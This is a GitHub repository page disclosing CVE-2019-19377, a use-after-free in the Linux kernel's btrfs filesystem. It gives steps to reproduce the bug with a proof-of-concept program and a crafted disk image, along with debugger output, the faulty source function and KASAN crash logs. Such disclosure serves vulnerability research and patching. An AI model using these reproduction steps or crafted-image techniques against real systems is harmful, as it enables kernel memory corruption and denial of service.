Skip to content

/ CVE

master
CVE/CVE-2019-19377/
Go to file
CVE/CVE-2019-19377/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
. .
README.md
 
 
poc_2019_19377.c
 
 
poc_2019_19377.zip
 
 

README.md

CVE-2019-19377

Target

Linux Kernel btrfs FileSystem

Linux Version Availablity
5.0.21 True

Bug Type

use-after-free

Abstract

umounting after some operations(with crafted image) can cause use-after-free in btrfs_queue_work function.

it can be not only local(mount btrfs image in local shell), but also remote(mount corrupted(with crafted btrfs image) USB or other storage)

Reproduce

gcc -o poc poc_2019_19377.c
mkdir mnt
mount poc_2019_19377.img ./mnt
cp poc ./mnt/
cd mnt
./poc
cd ..
umount ./mnt

Details

Debug view

────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0xdffffc0000000000  →  0xdffffc0000000000
$rbx   : 0xffff888067cf6840  →  0xffff88806648ae40  →  0xffff888067cf6740  →  0xffff88806bd32c00  →  0xffff888067739b10  →  0xffff88806c3ea200  →  0xffff88806c217900  →  0xffff88806ac58b80
$rcx   : 0xffffffff81a3c030  →  0x000000b848555441  →  0x000000b848555441
$rdx   : 0x1ffff1100cf9ed09  →  0x1ffff1100cf9ed09
$rsp   : 0xffff888064f9f788  →  0xffffffff81517225  →  0xc483480424448941  →  0xc483480424448941
$rbp   : 0xffff8880676e4d28  →  0xffffffff81a3ae50  →  0x53d86f8d48555441  →  0x53d86f8d48555441
$rsi   : 0xffff8880676e4d28  →  0xffffffff81a3ae50  →  0x53d86f8d48555441  →  0x53d86f8d48555441
$rdi   : 0xffff888067cf6848  →  0xffff88806ae2a900  →  0xffff88806bd33400  →  0xffff8880698dcd20  →  0xffff88806c3ea100  →  0xffff8880695e0f00  →  0xffff8880698b9840  →  0xffff8880664cf900
$rip   : 0xffffffff81aeddbc  →  0xfd98e9ffa2b26fe8  →  0xfd98e9ffa2b26fe8
$r8    : 0xffffffff81a3c020  →  0xad8727e928ef8348  →  0xad8727e928ef8348
$r9    : 0xffffffff81a413a1  →  0x00000009b8c38948  →  0x00000009b8c38948
$r10   : 0xffffffff81517225  →  0xc483480424448941  →  0xc483480424448941
$r11   : 0xffffffff81a413a1  →  0x00000009b8c38948  →  0x00000009b8c38948
$r12   : 0xffff88806bbc6600  →  0x1e44a09cf7d0cbce  →  0x1e44a09cf7d0cbce
$r13   : 0x0000000001c0f000  →  0x0000000001c0f000
$r14   : 0xffff8880676e4d28  →  0xffffffff81a3ae50  →  0x53d86f8d48555441  →  0x53d86f8d48555441
$r15   : 0xffff88806629c228  →  0x0000000000080000  →  0x0000000000080000
$eflags: [zero carry parity adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0010 $ss: 0x0018 $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffff888064f9f788│+0x0000: 0xffffffff81517225  →  0xc483480424448941  →  0xc483480424448941	 ← $rsp
0xffff888064f9f790│+0x0008: 0xffff8880676e4d00  →  0xffff88806629c228  →  0x0000000000080000  →  0x0000000000080000
0xffff888064f9f798│+0x0010: 0xffff888069fb6070  →  0x0000000000000000  →  0x0000000000000000
0xffff888064f9f7a0│+0x0018: 0xffff88806bbc6600  →  0x1e44a09cf7d0cbce  →  0x1e44a09cf7d0cbce
0xffff888064f9f7a8│+0x0020: 0x0000000001c0f000  →  0x0000000001c0f000
0xffff888064f9f7b0│+0x0028: 0xffff8880676e4d28  →  0xffffffff81a3ae50  →  0x53d86f8d48555441  →  0x53d86f8d48555441
0xffff888064f9f7b8│+0x0030: 0xffff88806629c228  →  0x0000000000080000  →  0x0000000000080000
0xffff888064f9f7c0│+0x0038: 0xffffffff81a4151d  →  0x5d415c415d5bc031  →  0x5d415c415d5bc031
──────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0xffffffff81aeddb2 <btrfs_queue_work+690> test   r13, r13
   0xffffffff81aeddb5 <btrfs_queue_work+693> jne    0xffffffff81aedd77 <btrfs_queue_work+631>
   0xffffffff81aeddb7 <btrfs_queue_work+695> jmp    0xffffffff81aedcab <btrfs_queue_work+427>
 → 0xffffffff81aeddbc <btrfs_queue_work+700> call   0xffffffff81519030 <__asan_report_load8_noabort>
   ↳  0xffffffff81519030 <__asan_report_load8_noabort+0> mov    rcx, QWORD PTR [rsp]
      0xffffffff81519034 <__asan_report_load8_noabort+4> xor    edx, edx
      0xffffffff81519036 <__asan_report_load8_noabort+6> mov    esi, 0x8
      0xffffffff8151903b <__asan_report_load8_noabort+11> jmp    0xffffffff815185f0 <kasan_report>
      0xffffffff81519040 <__asan_report_load16_noabort+0> mov    rcx, QWORD PTR [rsp]
      0xffffffff81519044 <__asan_report_load16_noabort+4> xor    edx, edx
────────────────────────────────────────────────────────────────────────────────────────── arguments ────
__asan_report_load8_noabort (
   long unsigned int var_0 = 0xffff888067cf6848 → 0xffff88806ae2a900 → 0xffff88806bd33400 → 0xffff8880698dcd20 → 0xffff88806c3ea100 → 0xffff8880695e0f00 → 0xffff8880698b9840 → 0xffff8880664cf900
)
──────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "", stopped, reason: BREAKPOINT
[#1] Id 2, Name: "", stopped, reason: BREAKPOINT
────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff81aeddbc → btrfs_queue_work(wq=0xffff888067cf6840, work=0xffff8880676e4d28)
[#1] 0xffffffff81a4151d → btrfs_wq_submit_bio(fs_info=0xffff88806bbc6600, bio=0xffff8880676e4d28, mirror_num=<optimized out>, bio_flags=<optimized out>, bio_offset=0xffffffff81a3c020, private_data=0xffffffff81a413a1 <btrfs_wq_submit_bio+81>, submit_bio_start=0xffffffff81a405c0 <btree_submit_bio_start>)
[#2] 0xffffffff81a4171c → btree_submit_bio_hook(private_data=0xffff88806629c228, bio=0xffff888069fb6070,mirror_num=0x0, bio_flags=<optimized out>, bio_offset=0x1c0f000)
[#3] 0xffffffff81ab130e → submit_one_bio(bio=0xffff888069fb6070, mirror_num=<optimized out>, bio_flags=<optimized out>)
[#4] 0xffffffff81ab1d7c → flush_write_bio(epd=<optimized out>)
[#5] 0xffffffff81ac5aeb → btree_write_cache_pages(mapping=<optimized out>, wbc=<optimized out>)
[#6] 0xffffffff81436a2c → do_writepages(mapping=0xffff88806629c388, wbc=0xffff888064f9fbd8)
[#7] 0xffffffff815c10f3 → __writeback_single_inode(inode=0xffff88806629c228, wbc=0xffff8880676e4d28)
[#8] 0xffffffff815c356d → writeback_single_inode(inode=0xffff88806629c228, wbc=0xffff888064f9fbd8)
[#9] 0xffffffff815c3955 → write_inode_now(inode=0xffff88806629c228, sync=<optimized out>)
─────────────────────────────────────────────────────────────────────────────────────────────────────────

Thread 1 hit Breakpoint 1, btrfs_queue_work (wq=0xffff888067cf6840, work=0xffff8880676e4d28) at fs/btrfs/async-threa
gef➤  p &wq->high
$5 = (struct __btrfs_workqueue **) 0xffff888067cf6848

parameter wq is freed. (wq->high occurs use-after-free)

Bug causes

fs/btrfs/async-thread.c:367 (link)

void btrfs_queue_work(struct btrfs_workqueue *wq,
		      struct btrfs_work *work)
{
	struct __btrfs_workqueue *dest_wq;

	if (test_bit(WORK_HIGH_PRIO_BIT, &work->flags) && wq->high)
		dest_wq = wq->high;
	else
		dest_wq = wq->normal;
	__btrfs_queue_work(dest_wq, work);
}

fs_info->workers(struct btrfs_workqueue *wq) is already freed.

KASAN logs

on exec poc

[  266.988653] BTRFS warning (device loop0): suspicious: generation < cache_generation: 8 < 18374403900871474942
[  267.055186] BTRFS warning (device loop0): suspicious: generation < cache_generation: 8 < 18374403900871474942
[  267.122934] BTRFS warning (device loop0): suspicious: generation < cache_generation: 8 < 18374403900871474942
[  267.165168] WARNING: CPU: 1 PID: 1045 at fs/btrfs/extent-tree.c:7046 __btrfs_free_extent.isra.71+0xa16/0x1130
[  267.165168] Modules linked in:
[  267.165168] CPU: 1 PID: 1045 Comm: kworker/u4:5 Not tainted 5.0.21 #1
[  267.165168] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[  267.165168] Workqueue: events_unbound btrfs_async_reclaim_metadata_space
[  267.165168] RIP: 0010:__btrfs_free_extent.isra.71+0xa16/0x1130
[  267.165168] Code: df 48 c1 ea 03 0f b6 04 02 84 c0 74 0e 3c 03 7f 0a 48 8b 7c 24 48 e8 c9 1a b0 ff 418b 4e 40 41 b8 01 00 00 00 e9 6e fe ff ff <0f> 0b 4c 89 f2 48 b8 00 00 00 00 00 fc ff df 48 c1 ea 03 80 3c 02
[  267.165168] RSP: 0018:ffff88806a26f7e0 EFLAGS: 00000246
[  267.165168] RAX: 00000000fffffffe RBX: 0000000000000007 RCX: 0000000000000000
[  267.165168] RDX: ffffed100d44deeb RSI: 0000000000000000 RDI: ffff8880694b8008
[  267.165168] RBP: 0000000001c04000 R08: 0000000000000000 R09: ffffed100d29700d
[  267.165168] R10: ffff8880694b806a R11: 0000000000000000 R12: 00000000fffffffe
[  267.165168] R13: 0000000000000000 R14: ffff8880694b8000 R15: 0000000000000000
[  267.165168] FS:  0000000000000000(0000) GS:ffff88806d300000(0000) knlGS:0000000000000000
[  267.165168] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  267.165168] CR2: 0000000000727c88 CR3: 000000006beba000 CR4: 00000000000006e0
[  267.165168] Call Trace:
[  267.165168]  ? _raw_spin_lock+0x7f/0xe0
[  267.165168]  ? update_block_group+0xd50/0xd50
[  267.165168]  ? _raw_read_lock_irq+0x30/0x30
[  267.165168]  ? _raw_spin_lock+0x7f/0xe0
[  267.165168]  ? _raw_read_lock_irq+0x30/0x30
[  267.165168]  ? btrfs_merge_delayed_refs+0x1f1/0x9d0
[  267.165168]  __btrfs_run_delayed_refs+0x1236/0x3100
[  267.165168]  ? alloc_reserved_file_extent+0x860/0x860
[  267.165168]  ? _raw_read_lock_irq+0x30/0x30
[  267.165168]  ? kasan_unpoison_shadow+0x31/0x40
[  267.165168]  ? __kasan_kmalloc+0xd5/0xf0
[  267.165168]  ? join_transaction+0x2e4/0xe90
[  267.165168]  btrfs_run_delayed_refs+0x1b6/0x390
[  267.165168]  flush_space+0x5fa/0xde0
[  267.165168]  ? __switch_to_asm+0x35/0x70
[  267.165168]  ? __switch_to_asm+0x41/0x70
[  267.165168]  ? __switch_to_asm+0x35/0x70
[  267.165168]  ? __switch_to_asm+0x41/0x70
[  267.165168]  ? __switch_to_asm+0x35/0x70
[  267.165168]  ? __switch_to_asm+0x41/0x70
[  267.165168]  ? __switch_to_asm+0x35/0x70
[  267.165168]  ? __switch_to_asm+0x41/0x70
[  267.165168]  ? __switch_to_asm+0x35/0x70
[  267.165168]  ? __switch_to_asm+0x41/0x70
[  267.165168]  ? delayed_ref_async_start+0x2d0/0x2d0
[  267.165168]  ? __switch_to_asm+0x41/0x70
[  267.165168]  ? __switch_to_asm+0x35/0x70
[  267.165168]  ? _raw_spin_lock+0x7f/0xe0
[  267.165168]  ? _raw_read_lock_irq+0x30/0x30
[  267.165168]  ? __switch_to_asm+0x41/0x70
[  267.165168]  ? __switch_to_asm+0x41/0x70
[  267.165168]  ? __switch_to_asm+0x35/0x70
[  267.165168]  btrfs_async_reclaim_metadata_space+0x451/0x1260
[  267.165168]  ? strscpy+0x95/0x310
[  267.165168]  process_one_work+0x580/0x1210
[  267.165168]  worker_thread+0x8a/0xfc0
[  267.165168]  ? __kthread_parkme+0x73/0xf0
[  267.165168]  ? rescuer_thread+0xc60/0xc60
[  267.165168]  kthread+0x2a9/0x390
[  267.165168]  ? kthread_destroy_worker+0x90/0x90
[  267.165168]  ret_from_fork+0x35/0x40
[  267.165168] ---[ end trace ae8f476daf11ea95 ]---
[  267.187699] BTRFS info (device loop0): leaf 29421568 gen 9 total ptrs 10 free space 3275 owner 18446744073709551610
[  267.190805] 	item 0 key (12582912 168 69632) itemoff 3942 itemsize 53
[  267.193486] 		extent refs 1 gen 9 flags 1
[  267.196265] 		ref#0: extent data backref root 5 objectid 265 offset 0 count 1
[  267.199482] 	item 1 key (12652544 168 36864) itemoff 3889 itemsize 53
[  267.203159] 		extent refs 1 gen 9 flags 1
[  267.203725] 		ref#0: extent data backref root 5 objectid 265 offset 131072 count 1
[  267.203980] 	item 2 key (12689408 168 262144) itemoff 3836 itemsize 53
[  267.203980] 		extent refs 1 gen 9 flags 1
[  267.203980] 		ref#0: extent data backref root 5 objectid 265 offset 262144 count 1
[  267.203980] 	item 3 key (12951552 168 61440) itemoff 3783 itemsize 53
[  267.203980] 		extent refs 1 gen 9 flags 1
[  267.203980] 		ref#0: extent data backref root 5 objectid 265 offset 524288 count 1
[  267.203980] 	item 4 key (13012992 168 49152) itemoff 3730 itemsize 53
[  267.203980] 		extent refs 1 gen 9 flags 1
[  267.203980] 		ref#0: extent data backref root 5 objectid 265 offset 655360 count 1
[  267.207732] 	item 5 key (13062144 168 24576) itemoff 3677 itemsize 53
[  267.210899] 		extent refs 1 gen 9 flags 1
[  267.211173] 		ref#0: extent data backref root 5 objectid 265 offset 786432 count 1
[  267.214637] 	item 6 key (13090816 168 4096) itemoff 3624 itemsize 53
[  267.214926] 		extent refs 1 gen 9 flags 1
[  267.217439] 		ref#0: extent data backref root 5 objectid 259 offset 0 count 1
[  267.217899] 	item 7 key (29360128 169 0) itemoff 3591 itemsize 33
[  267.220401] 		extent refs 1 gen 9 flags 2
[  267.220590] 		ref#0: tree block backref root 5
[  267.220958] 	item 8 key (29368320 169 0) itemoff 3558 itemsize 33
[  267.221142] 		extent refs 1 gen 9 flags 2
[  267.223433] 		ref#0: tree block backref root 7
[  267.223622] 	item 9 key (29372416 169 1) itemoff 3525 itemsize 33
[  267.223811] 		extent refs 1 gen 9 flags 2
[  267.223919] 		ref#0: tree block backref root 5
[  267.224076] BTRFS error (device loop0): unable to find ref byte nr 29376512 parent 0 root 7  owner 0 offset 0
[  267.224266] ------------[ cut here ]------------
[  267.224281] WARNING: CPU: 1 PID: 1045 at fs/btrfs/extent-tree.c:7052 __btrfs_free_extent.isra.71+0xaa0/0x1130
[  267.224281] Modules linked in:
[  267.224281] CPU: 1 PID: 1045 Comm: kworker/u4:5 Tainted: G        W         5.0.21 #1
[  267.224281] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[  267.224281] Workqueue: events_unbound btrfs_async_reclaim_metadata_space
[  267.224281] RIP: 0010:__btrfs_free_extent.isra.71+0xaa0/0x1130
[  267.224281] Code: b0 05 00 00 48 8b 44 24 10 48 8b 40 50 f0 48 0f ba a8 b8 0c 00 00 02 72 13 be fe ffff ff 48 c7 c7 c0 ae d2 83 e8 00 14 6f ff <0f> 0b 48 8b 7c 24 10 b9 fe ff ff ff ba 8c 1b 00 00 48 c7 c6 40 c4
[  267.224281] RSP: 0018:ffff88806a26f7e0 EFLAGS: 00000282
[  267.224281] RAX: 0000000000000000 RBX: 0000000000000007 RCX: ffffffff813b1280
[  267.224281] RDX: 0000000000000001 RSI: 0000000000000008 RDI: ffff88806d3304d0
[  267.224281] RBP: 0000000001c04000 R08: ffffed100da6609b R09: ffffed100da6609b
[  267.224281] R10: dffffc0000000000 R11: ffffed100da6609a R12: 00000000fffffffe
[  267.224281] R13: 0000000000000000 R14: ffff8880694b8000 R15: 0000000000000000
[  267.224281] FS:  0000000000000000(0000) GS:ffff88806d300000(0000) knlGS:0000000000000000
[  267.224281] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  267.224281] CR2: 0000000000727c88 CR3: 000000006beba000 CR4: 00000000000006e0
[  267.224281] Call Trace:
[  267.224281]  ? _raw_spin_lock+0x7f/0xe0
[  267.224281]  ? update_block_group+0xd50/0xd50
[  267.224281]  ? _raw_read_lock_irq+0x30/0x30
[  267.224281]  ? _raw_spin_lock+0x7f/0xe0
[  267.224281]  ? _raw_read_lock_irq+0x30/0x30
[  267.224281]  ? btrfs_merge_delayed_refs+0x1f1/0x9d0
[  267.224281]  __btrfs_run_delayed_refs+0x1236/0x3100
[  267.224281]  ? alloc_reserved_file_extent+0x860/0x860
[  267.224281]  ? _raw_read_lock_irq+0x30/0x30
[  267.224281]  ? kasan_unpoison_shadow+0x31/0x40
[  267.224281]  ? __kasan_kmalloc+0xd5/0xf0
[  267.224281]  ? join_transaction+0x2e4/0xe90
[  267.224281]  btrfs_run_delayed_refs+0x1b6/0x390
[  267.224281]  flush_space+0x5fa/0xde0
[  267.224281]  ? __switch_to_asm+0x35/0x70
[  267.224281]  ? __switch_to_asm+0x41/0x70
[  267.224281]  ? __switch_to_asm+0x35/0x70
[  267.224281]  ? __switch_to_asm+0x41/0x70
[  267.224281]  ? __switch_to_asm+0x35/0x70
[  267.224281]  ? __switch_to_asm+0x41/0x70
[  267.224281]  ? __switch_to_asm+0x35/0x70
[  267.224281]  ? __switch_to_asm+0x41/0x70
[  267.224281]  ? __switch_to_asm+0x35/0x70
[  267.224281]  ? __switch_to_asm+0x41/0x70
[  267.224281]  ? delayed_ref_async_start+0x2d0/0x2d0
[  267.224281]  ? __switch_to_asm+0x41/0x70
[  267.224281]  ? __switch_to_asm+0x35/0x70
[  267.224281]  ? _raw_spin_lock+0x7f/0xe0
[  267.224281]  ? _raw_read_lock_irq+0x30/0x30
[  267.224281]  ? __switch_to_asm+0x41/0x70
[  267.224281]  ? __switch_to_asm+0x41/0x70
[  267.224281]  ? __switch_to_asm+0x35/0x70
[  267.224281]  btrfs_async_reclaim_metadata_space+0x451/0x1260
[  267.224281]  ? strscpy+0x95/0x310
[  267.224281]  process_one_work+0x580/0x1210
[  267.224281]  worker_thread+0x8a/0xfc0
[  267.224281]  ? __kthread_parkme+0x73/0xf0
[  267.224281]  ? rescuer_thread+0xc60/0xc60
[  267.224281]  kthread+0x2a9/0x390
[  267.224281]  ? kthread_destroy_worker+0x90/0x90
[  267.224281]  ret_from_fork+0x35/0x40
[  267.224281] ---[ end trace ae8f476daf11ea96 ]---
[  267.243654] BTRFS: error (device loop0) in __btrfs_free_extent:7052: errno=-2 No such entry
[  267.246314] BTRFS info (device loop0): forced readonly
[  267.249337] BTRFS: error (device loop0) in btrfs_run_delayed_refs:3011: errno=-2 No such entry

on umount

[  272.756573] WARNING: CPU: 0 PID: 1922 at fs/btrfs/extent-tree.c:5995 btrfs_free_block_groups+0x7e2/0xaf0
[  272.757294] Modules linked in:
[  272.757294] CPU: 0 PID: 1922 Comm: umount Tainted: G        W         5.0.21 #1
[  272.757294] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[  272.757294] RIP: 0010:btrfs_free_block_groups+0x7e2/0xaf0
[  272.757294] Code: 28 31 c0 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 0b e9 c9 fc ff ff 0f 0b e9 f2 fc ff ff0f 0b e9 1b fd ff ff 0f 0b e9 44 fd ff ff <0f> 0b e9 6d fd ff ff 0f 0b e9 96 fd ff ff 0f 0b e9 bf fd ff ff 0f
[  272.757294] RSP: 0018:ffff888064f9fc50 EFLAGS: 00000206
[  272.757294] RAX: dffffc0000000000 RBX: ffff88806bbc6600 RCX: 0000000000000000
[  272.757294] RDX: 1ffff1100d778cf9 RSI: 0000000000000004 RDI: ffff88806bbc67c8
[  272.757294] RBP: dffffc0000000000 R08: 1ffff1100c9f3f65 R09: 0000000000000002
[  272.757294] R10: ffff88806a030f28 R11: 0000000002000000 R12: ffff888069c29f80
[  272.757294] R13: ffff88806bbc6690 R14: ffff888069c2a050 R15: 0000000000000000
[  272.757294] FS:  00007f4d6191ee40(0000) GS:ffff88806d200000(0000) knlGS:0000000000000000
[  272.757294] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  272.757294] CR2: 00007f4d611e9d70 CR3: 0000000069972000 CR4: 00000000000006f0
[  272.757294] Call Trace:
[  272.757294]  close_ctree+0x308/0x750
[  272.757294]  ? transaction_kthread+0x400/0x400
[  272.757294]  ? dispose_list+0x180/0x180
[  272.757294]  ? dput+0x29c/0x3c0
[  272.757294]  generic_shutdown_super+0x126/0x370
[  272.757294]  kill_anon_super+0x31/0x50
[  272.757294]  btrfs_kill_super+0x36/0x2b0
[  272.757294]  deactivate_locked_super+0x80/0xc0
[  272.757294]  deactivate_super+0x13c/0x150
[  272.757294]  ? super_setup_bdi+0xa0/0xa0
[  272.757294]  cleanup_mnt+0x9a/0x130
[  272.757294]  task_work_run+0x11a/0x1b0
[  272.757294]  exit_to_usermode_loop+0x107/0x130
[  272.757294]  do_syscall_64+0x1e5/0x280
[  272.757294]  ? page_fault+0x8/0x30
[  272.757294]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  272.757294] RIP: 0033:0x7f4d61200d77
[  272.757294] Code: 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 31 f6 e9 09 00 00 00 66 0f1f 84 00 00 00 00 00 b8 a6 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d f1 00 2b 00 f7 d8 64 89 01 48
[  272.757294] RSP: 002b:00007ffc2b474258 EFLAGS: 00000246 ORIG_RAX: 00000000000000a6
[  272.757294] RAX: 0000000000000000 RBX: 0000560b26f40080 RCX: 00007f4d61200d77
[  272.757294] RDX: 0000000000000001 RSI: 0000000000000000 RDI: 0000560b26f44940
[  272.757294] RBP: 0000560b26f44940 R08: 0000560b26f43e10 R09: 0000000000000015
[  272.757294] R10: 00000000000006b4 R11: 0000000000000246 R12: 00007f4d61702e64
[  272.757294] R13: 0000000000000000 R14: 0000560b26f40260 R15: 00007ffc2b4744e0
[  272.757294] ---[ end trace ae8f476daf11ea97 ]---
[  272.771891] WARNING: CPU: 0 PID: 1922 at fs/btrfs/extent-tree.c:5996 btrfs_free_block_groups+0x7e9/0xaf0
[  272.772455] Modules linked in:
[  272.772455] CPU: 0 PID: 1922 Comm: umount Tainted: G        W         5.0.21 #1
[  272.772455] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[  272.772455] RIP: 0010:btrfs_free_block_groups+0x7e9/0xaf0
[  272.772455] Code: 41 5d 41 5e 41 5f c3 0f 0b e9 c9 fc ff ff 0f 0b e9 f2 fc ff ff 0f 0b e9 1b fd ff ff0f 0b e9 44 fd ff ff 0f 0b e9 6d fd ff ff <0f> 0b e9 96 fd ff ff 0f 0b e9 bf fd ff ff 0f 0b e9 e8 fd ff ff e8
[  272.772455] RSP: 0018:ffff888064f9fc50 EFLAGS: 00000206
[  272.772455] RAX: dffffc0000000000 RBX: ffff88806bbc6600 RCX: 0000000000000000
[  272.772455] RDX: 1ffff1100d778cfa RSI: 0000000000000004 RDI: ffff88806bbc67d0
[  272.772455] RBP: dffffc0000000000 R08: 1ffff1100c9f3f65 R09: 0000000000000002
[  272.772455] R10: ffff88806a030f28 R11: 0000000002000000 R12: ffff888069c29f80
[  272.772455] R13: ffff88806bbc6690 R14: ffff888069c2a050 R15: 0000000000000000
[  272.772455] FS:  00007f4d6191ee40(0000) GS:ffff88806d200000(0000) knlGS:0000000000000000
[  272.772455] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  272.772455] CR2: 00007f4d611e9d70 CR3: 0000000069972000 CR4: 00000000000006f0
[  272.772455] Call Trace:
[  272.772455]  close_ctree+0x308/0x750
[  272.772455]  ? transaction_kthread+0x400/0x400
[  272.772455]  ? dispose_list+0x180/0x180
[  272.772455]  ? dput+0x29c/0x3c0
[  272.772455]  generic_shutdown_super+0x126/0x370
[  272.772455]  kill_anon_super+0x31/0x50
[  272.772455]  btrfs_kill_super+0x36/0x2b0
[  272.772455]  deactivate_locked_super+0x80/0xc0
[  272.772455]  deactivate_super+0x13c/0x150
[  272.772455]  ? super_setup_bdi+0xa0/0xa0
[  272.772455]  cleanup_mnt+0x9a/0x130
[  272.772455]  task_work_run+0x11a/0x1b0
[  272.772455]  exit_to_usermode_loop+0x107/0x130
[  272.772455]  do_syscall_64+0x1e5/0x280
[  272.772455]  ? page_fault+0x8/0x30
[  272.772455]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  272.772455] RIP: 0033:0x7f4d61200d77
[  272.772455] Code: 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 31 f6 e9 09 00 00 00 66 0f1f 84 00 00 00 00 00 b8 a6 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d f1 00 2b 00 f7 d8 64 89 01 48
[  272.772455] RSP: 002b:00007ffc2b474258 EFLAGS: 00000246 ORIG_RAX: 00000000000000a6
[  272.772455] RAX: 0000000000000000 RBX: 0000560b26f40080 RCX: 00007f4d61200d77
[  272.772455] RDX: 0000000000000001 RSI: 0000000000000000 RDI: 0000560b26f44940
[  272.772455] RBP: 0000560b26f44940 R08: 0000560b26f43e10 R09: 0000000000000015
[  272.772455] R10: 00000000000006b4 R11: 0000000000000246 R12: 00007f4d61702e64
[  272.772455] R13: 0000000000000000 R14: 0000560b26f40260 R15: 00007ffc2b4744e0
[  272.772455] ---[ end trace ae8f476daf11ea98 ]---
[  272.790491] WARNING: CPU: 0 PID: 1922 at fs/btrfs/extent-tree.c:10142 btrfs_free_block_groups+0x6ad/0xaf0
[  272.790605] Modules linked in:
[  272.790605] CPU: 0 PID: 1922 Comm: umount Tainted: G        W         5.0.21 #1
[  272.790605] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[  272.790605] RIP: 0010:btrfs_free_block_groups+0x6ad/0xaf0
[  272.790605] Code: 0f 85 34 04 00 00 49 83 7f 98 00 75 1d 48 8d 7e 28 48 89 f8 48 c1 e8 03 42 80 3c 2000 0f 85 03 04 00 00 49 83 7f a0 00 74 0e <0f> 0b 31 c9 31 d2 48 89 df e8 35 4f fe ff 4c 89 f8 48 c1 e8 03 42
[  272.790605] RSP: 0018:ffff888064f9fc50 EFLAGS: 00000206
[  272.790605] RAX: 1ffff1100d4061e5 RBX: ffff88806bbc6600 RCX: ffff888068b79e80
[  272.790605] RDX: 00000000000f9b40 RSI: ffff88806a030f00 RDI: ffff88806a030f28
[  272.790605] RBP: ffff88806a031580 R08: ffffffff81516f72 R09: ffffffff815147e9
[  272.790605] R10: ffffffff815147e9 R11: ffffffff83632d56 R12: dffffc0000000000
[  272.790605] R13: ffff88806a0315f8 R14: 0000000000000000 R15: ffff88806a030f88
[  272.790605] FS:  00007f4d6191ee40(0000) GS:ffff88806d200000(0000) knlGS:0000000000000000
[  272.790605] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  272.790605] CR2: 00007f4d611e9d70 CR3: 0000000069972000 CR4: 00000000000006f0
[  272.790605] Call Trace:
[  272.790605]  close_ctree+0x308/0x750
[  272.790605]  ? transaction_kthread+0x400/0x400
[  272.790605]  ? dispose_list+0x180/0x180
[  272.790605]  ? dput+0x29c/0x3c0
[  272.790605]  generic_shutdown_super+0x126/0x370
[  272.790605]  kill_anon_super+0x31/0x50
[  272.790605]  btrfs_kill_super+0x36/0x2b0
[  272.790605]  deactivate_locked_super+0x80/0xc0
[  272.790605]  deactivate_super+0x13c/0x150
[  272.790605]  ? super_setup_bdi+0xa0/0xa0
[  272.790605]  cleanup_mnt+0x9a/0x130
[  272.790605]  task_work_run+0x11a/0x1b0
[  272.790605]  exit_to_usermode_loop+0x107/0x130
[  272.790605]  do_syscall_64+0x1e5/0x280
[  272.790605]  ? page_fault+0x8/0x30
[  272.790605]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  272.790605] RIP: 0033:0x7f4d61200d77
[  272.790605] Code: 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 31 f6 e9 09 00 00 00 66 0f1f 84 00 00 00 00 00 b8 a6 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d f1 00 2b 00 f7 d8 64 89 01 48
[  272.790605] RSP: 002b:00007ffc2b474258 EFLAGS: 00000246 ORIG_RAX: 00000000000000a6
[  272.790605] RAX: 0000000000000000 RBX: 0000560b26f40080 RCX: 00007f4d61200d77
[  272.790605] RDX: 0000000000000001 RSI: 0000000000000000 RDI: 0000560b26f44940
[  272.790605] RBP: 0000560b26f44940 R08: 0000560b26f43e10 R09: 0000000000000015
[  272.790605] R10: 00000000000006b4 R11: 0000000000000246 R12: 00007f4d61702e64
[  272.790605] R13: 0000000000000000 R14: 0000560b26f40260 R15: 00007ffc2b4744e0
[  272.790605] ---[ end trace ae8f476daf11ea99 ]---
[  272.807234] BTRFS info (device loop0): space_info 4 has 18243584 free, is not full
[  272.813300] BTRFS info (device loop0): space_info total=33554432, used=15179776, pinned=0, reserved=0, may_use=65536, readonly=65536
[  272.825171] ==================================================================
[  272.825171] BUG: KASAN: use-after-free in btrfs_queue_work+0x2c1/0x390
[  272.825171] Read of size 8 at addr ffff888067cf6848 by task umount/1922
[  272.825171]
[  272.825171] CPU: 0 PID: 1922 Comm: umount Tainted: G        W         5.0.21 #1
[  272.825171] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[  272.825171] Call Trace:
[  272.825171]  dump_stack+0x5b/0x8b
[  272.825171]  print_address_description+0x70/0x280
[  272.825171]  ? btrfs_queue_work+0x2c1/0x390
[  272.825171]  kasan_report+0x13a/0x19b
[  272.825171]  ? btrfs_queue_work+0x2c1/0x390
[  272.825171]  ? kasan_cache_shutdown+0x20/0x20
